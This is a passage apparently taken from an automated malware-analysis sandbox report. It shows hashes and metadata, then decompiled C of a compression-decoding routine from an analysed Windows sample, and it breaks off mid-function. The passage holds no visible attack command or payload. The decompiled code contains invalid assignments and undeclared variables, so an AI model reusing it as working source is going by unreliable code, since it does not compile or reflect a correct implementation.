                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 4115351271-2030658151
                                                                                    • Opcode ID: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                    • Instruction ID: 28437e5e833f6c5712a3d87292ca06883de7807d6adf700678bf42288e0e849f
                                                                                    • Opcode Fuzzy Hash: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                    • Instruction Fuzzy Hash: 11D0C922656E3032C651363A3C0AFDF091C8F5271AF55847BF908B40D64B6C5A5259EF
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 99%
                                                                                    			E00406566() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
